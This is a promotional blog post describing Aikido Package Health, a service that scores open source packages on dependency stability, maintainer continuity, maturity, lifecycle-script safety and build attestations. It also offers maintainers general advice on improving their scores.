TLDR
Aikido Package Health surfaces the true health of an open source package with a single score. It helps devs understand stability, maintenance quality, and supply-chain risk before installing a dependency.
.png)
Aikido Package Health is a public service that assigns a clear Health Score to open source packages. It gives you an honest signal about which dependencies are well-maintained and safe to adopt, and which ones might need extra scrutiny before you pull them into your project.
The goal is simple. Give devs visibility into the long-term reliability of their dependencies, not just their vulnerability status. Because maintenance patterns, stability, and hygiene matter just as much as CVEs.
This post walks through what makes a package healthy and what maintainers can do to improve their score.
Why Package Health matters
Choosing dependencies is fast, but understanding their long-term stability is not. Maintainers change, release patterns shift, dependency trees grow, and install scripts evolve quietly over time. These signals affect reliability, yet most teams never see them.
Package Health brings this information into one place. It looks at how a package’s dependency tree evolves, how stable its maintainers are, how predictable its releases have been, how safe its lifecycle scripts behave, and whether provenance data is available. These signals turn into a simple Health Score that helps devs make safer, faster decisions.
.png)
How Aikido calculates a Health Score
Each Health Score is built from measurable behaviour extracted from a package’s release and metadata history. We look at how the project changes over time, who maintains it, what scripts it runs during install, and whether its builds can be verified.
The score is composed of five weighted categories:
Dependencies
How stable the dependency tree is between versions.
.png)
Maintainer Stability
How consistent the release authors are and whether maintainership has shifted unexpectedly.
Maturity
How long the project has existed, how predictably it evolves, and whether releases follow a sensible cadence.
Supply-Chain Scripts
How safe the package’s lifecycle scripts are and whether they introduce unnecessary risk during installation.
Attestations
Whether the project includes verifiable provenance to prove that builds are authentic and reproducible.
These categories combine into a clear, at-a-glance signal of package health.
Keeping each category healthy
Maintainers can actively improve their Health Score through a few steady habits. The same principles help if you maintain internal libraries or evaluate external dependencies.
1. Keep your dependency tree lean
Add runtime dependencies only when they’re essential. Every new dependency adds transitive risk and maintenance overhead. Prefer small, well-audited modules or reuse existing ones already trusted in your ecosystem. If you add something new, document the reasoning and check its security track record.
2. Maintain continuity among maintainers
A consistent set of maintainers creates confidence. Plan handovers properly, keep a changelog that links releases to authors, and avoid long inactivity gaps. Stable authorship helps users and automated tools detect when a project is drifting or abandoned.
3. Publish steadily and respect version history
Regular releases, even small ones, show that the project is supported. Keep semantic versioning consistent. Avoid rewriting history. Tag releases clearly. A predictable cadence directly improves maturity and trust.
4. Review and harden lifecycle scripts
Install-time scripts are common sources of supply-chain issues. Remove scripts you don’t need. If you keep them, ensure they avoid network calls, privileged actions, or hidden behaviour during installation. Static analysis and scanning help catch risky patterns early.
5. Use attestations to prove integrity
Automate provenance and SBOM attestations in CI. They provide cryptographic proof that builds are reproducible and untampered. Once added, monitor for regressions and fix missing attestations quickly to maintain a strong security posture.
By following these practices, packages naturally maintain higher scores and earn more trust from devs and security tools.
Helping maintainers build safer open source
.png)
Aikido’s Health Score highlights maintenance quality, not just known vulnerabilities. It acts as an early-warning system for ecosystem drift, showing when a project’s hygiene starts slipping long before it becomes security debt.
By giving maintainers clear feedback and helping devs make informed decisions, Aikido aims to strengthen the open source ecosystem and make it safer, more transparent, and more resilient for everyone relying on it.
Find the right package for your project → https://intel.aikido.dev/packages
Secure your software now
